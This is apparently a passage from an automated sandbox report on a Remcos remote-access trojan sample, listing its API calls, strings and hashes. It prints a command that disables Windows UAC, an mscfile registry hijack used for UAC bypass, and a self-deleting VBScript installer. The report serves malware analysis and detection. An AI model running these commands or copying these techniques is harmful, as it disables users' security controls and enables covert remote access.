Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603

Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992

Strings

h5S, xrefs: 0040D8AC, 0040D8B6, 0040D8F2, 0040D919, 0040D9F6
C:\Users\user\Desktop\DB5rQYsfd6.exe, xrefs: 0040D68F, 0040D8A7
@8T, xrefs: 0040D904, 0040D9B8
origmsc, xrefs: 0040D6F7
`"G, xrefs: 0040DCA3
Inj, xrefs: 0040D626, 0040D62C, 0040D641
Attempt-S4A0CI, xrefs: 0040D52A, 0040D586, 0040D656
User, xrefs: 0040DD2C
Exe, xrefs: 0040D539
Software\, xrefs: 0040D4E6
licence, xrefs: 0040DA22
Access Level: , xrefs: 0040DD3D
license_code.txt, xrefs: 0040D465
Exe, xrefs: 0040D534
exepath, xrefs: 0040D931, 0040D9DB
Administrator, xrefs: 0040DD08
(#G, xrefs: 0040D596
Remcos Agent initialized, xrefs: 0040DA83

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
String ID: (#G$@8T$Access Level: $Administrator$Attempt-S4A0CI$C:\Users\user\Desktop\DB5rQYsfd6.exe$Exe$Exe$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$h5S$licence$license_code.txt$origmsc
API String ID: 1529173511-3130601473
Opcode ID: 2ed733684bd5ca056eb8e9b7aa60f0ddb74596f8e79d911b33316d383e3c192b
Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
Opcode Fuzzy Hash: 2ed733684bd5ca056eb8e9b7aa60f0ddb74596f8e79d911b33316d383e3c192b
Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

Function 0040B871 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 296
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 0040B882
CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
CopyFileW.KERNELBASE(C:\Users\user\Desktop\DB5rQYsfd6.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
_wcslen.LIBCMT ref: 0040B968
CopyFileW.KERNEL32(C:\Users\user\Desktop\DB5rQYsfd6.exe,00000000,00000000,00000000), ref: 0040B9E0
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
_wcslen.LIBCMT ref: 0040BA25
SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
ExitProcess.KERNEL32 ref: 0040BC36

Strings

\install.vbs, xrefs: 0040BA3E
WScript.Sleep 1000, xrefs: 0040BA6D
h5S, xrefs: 0040B8C6, 0040B8F8, 0040BB56
C:\Users\user\Desktop\DB5rQYsfd6.exe, xrefs: 0040B916, 0040B91B, 0040B94B, 0040B9DA, 0040B9DF, 0040B9E6, 0040BAAA
fso.DeleteFile , xrefs: 0040BAB6
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040BB57
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040BBD2
open, xrefs: 0040BC24
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040BA7B
""", 0, xrefs: 0040BB47
$.F, xrefs: 0040BA9D
t<F, xrefs: 0040BA91
6, xrefs: 0040B95C
Temp, xrefs: 0040BA43

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
String ID: """, 0$$.F$6$C:\Users\user\Desktop\DB5rQYsfd6.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$h5S$open$t<F
API String ID: 2743683619-2476706462
Opcode ID: 55d877feadc99f119a9894dd19d5bd17b3ca3ecbbde1c983e34bc6ef620285c2
Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
Opcode Fuzzy Hash: 55d877feadc99f119a9894dd19d5bd17b3ca3ecbbde1c983e34bc6ef620285c2
Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E

Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753

Strings

SystemDrive, xrefs: 0040C64A
ProgramFiles, xrefs: 0040C727
WinDir, xrefs: 0040C654, 0040C676, 0040C6C8
\system32, xrefs: 0040C667
AppData, xrefs: 0040C70A
\SysWOW64, xrefs: 0040C6B9
ProgramData, xrefs: 0040C718
UserProfile, xrefs: 0040C711
Temp, xrefs: 0040C61F

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-425784914
Opcode ID: efc3c0baafdbfff7e48422d81b3d3964992ef81177afee3682326039726f1f54
Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
Opcode Fuzzy Hash: efc3c0baafdbfff7e48422d81b3d3964992ef81177afee3682326039726f1f54
Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F3B

Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD

StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327

Strings

CurrentBuildNumber, xrefs: 00419308
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004192C2, 004192CC, 0041930D
ProductName, xrefs: 004192BD
(32 bit), xrefs: 0041935A
(64 bit), xrefs: 00419353

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: Process$CloseCurrentOpenQueryValueWow64
String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 782494840-2070987746
Opcode ID: 156a184d01e916dba470f1893c8ece1237ddc25b581fb251fffab04ca2ede48f
Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
Opcode Fuzzy Hash: 156a184d01e916dba470f1893c8ece1237ddc25b581fb251fffab04ca2ede48f
Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
C:\Windows\System32\cmd.exe, xrefs: 0040E542

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 0b970088cbc172ce3b0f8ed072908de03e6d7713b03aec3cda7e5915f8f0f445
Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
Opcode Fuzzy Hash: 0b970088cbc172ce3b0f8ed072908de03e6d7713b03aec3cda7e5915f8f0f445
Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5

Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
WriteFile.KERNELBASE(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID:
API String ID: 1852769593-0
Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

Function 004120E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
RegCloseKey.ADVAPI32(00000000), ref: 00412128

Strings

origmsc, xrefs: 004120F4

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: origmsc
API String ID: 3677997916-68016026
Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4

Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 0041220F
RegSetValueExW.KERNELBASE(?,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,C:\Users\user\Desktop\DB5rQYsfd6.exe), ref: 0041223E
RegCloseKey.ADVAPI32(?,?,80000001,?,0040674F,00469654,C:\Users\user\Desktop\DB5rQYsfd6.exe), ref: 00412249

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 0041220D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Classes\mscfile\shell\open\command
API String ID: 1818849710-505396733
Opcode ID: 648c2acabd6d386b3cfaeca52641303c516f0863a12d7755eae886d0bed66f7b
Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
Opcode Fuzzy Hash: 648c2acabd6d386b3cfaeca52641303c516f0863a12d7755eae886d0bed66f7b
Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94

Function 00411F91 Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
RegCloseKey.KERNELBASE(?), ref: 00411FDD

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 7a1544548b3f7c2bdbc79f0242f37fe977c23e2c99779a8425445d9686f74cb1
Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
Opcode Fuzzy Hash: 7a1544548b3f7c2bdbc79f0242f37fe977c23e2c99779a8425445d9686f74cb1
Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8

Function 00411F34 Relevance: 4.5, APIs: 3, Instructions: 37
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
RegCloseKey.ADVAPI32(?), ref: 00411F7D

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94

Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

Function 00443649 Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD

Non-executed Functions

Function 00410B5C Relevance: 35.2, APIs: 7, Strings: 13, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00410B6B

Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
CloseHandle.KERNEL32(00000000), ref: 00410BBA
CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F

Strings

svchost.exe, xrefs: 00410D2A
Watchdog module activated, xrefs: 00410BE9, 00410E41
h5S, xrefs: 00410C47
\SysWOW64\, xrefs: 00410CC6
WinDir, xrefs: 00410C80, 00410CD5
WDH, xrefs: 00410C1A, 00410C20, 00410E85
rmclient.exe, xrefs: 00410D4F
\system32\, xrefs: 00410C6E
T/F, xrefs: 00410BD2
fsutil.exe, xrefs: 00410D74
Watchdog launch failed!, xrefs: 00410DE8
Remcos restarted by watchdog!, xrefs: 00410BC5
(#G, xrefs: 00410B98

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: (#G$Remcos restarted by watchdog!$T/F$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$h5S$rmclient.exe$svchost.exe
API String ID: 3018269243-3917573979
Opcode ID: b3dfcf4463fbf2cca260735c8ecdde3b8902cd66c8ba09f9d97a59f394eae5ef
Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
Opcode Fuzzy Hash: b3dfcf4463fbf2cca260735c8ecdde3b8902cd66c8ba09f9d97a59f394eae5ef
Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F

Function 00406D28 Relevance: 34.1, APIs: 9, Strings: 10, Instructions: 810fileCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00406D4A
GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
DeleteFileW.KERNEL32(00000000), ref: 00406E3A

Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
DeleteFileA.KERNEL32(?), ref: 0040768E

Strings

Unable to delete: , xrefs: 00406E98
Downloading file: , xrefs: 0040700E
Unable to rename file!, xrefs: 004074A4
Browsing directory: , xrefs: 004072C9
Downloaded file: , xrefs: 004070BF
Deleted file: , xrefs: 00406E59
T/F, xrefs: 0040701E
Failed to download file: , xrefs: 00407136
Executing file: , xrefs: 0040723E
open, xrefs: 00407222

Memory Dump Source

Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
